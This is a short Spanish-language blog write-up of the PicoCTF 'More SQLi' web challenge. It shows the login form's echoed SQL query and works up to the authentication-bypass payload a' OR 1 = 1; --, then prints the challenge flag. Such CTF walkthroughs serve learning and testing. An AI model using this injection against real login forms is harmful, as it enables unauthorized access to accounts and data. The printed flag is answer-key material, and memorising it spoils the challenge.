Entrada

More SQLi

Publicado Actualizado
PicoCTF
PicoCTF
Por Pablo Martínez Rivas
1 min de lectura

More SQLi Author: Mubarak Mikail Description Can you find the flag on this website. Try to find the flag here.

Como este ejercicio va de injecciones SQL empezamos con el típico ‘1 = 1’ para ver el resultado.

1
2
3
4

username: admin
password: 1 = 1
SQL query: SELECT id FROM users WHERE password = '1 = 1' AND username = 'admin'

Viendo esto, creo que podemos intentar injectar con un OR, añadiendo “–” para comentar el resto de la query, etc. Luego podemos ver como queda la query e ir retocándola.

1
2
3

SELECT id FROM users WHERE password = 'pass OR 1 = 1' AND username = 'admin'
pass OR 1 = 1 --'

Finalmente compruebo que esta funciona. También puedes usar herramientas automáticas como un Fuzzer o SQLMap

1

a' OR 1 = 1; --

1
2
3

username: test
password: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_62aa7500}
SQL query: SELECT id FROM users WHERE password = 'picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_62aa7500}' AND username = 'test'

flag: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_62aa7500}

Una de SQLi.

writeup, picoctf
picoctf more sqli explotación web
Esta entrada está licenciada bajo CC BY 4.0 por el autor.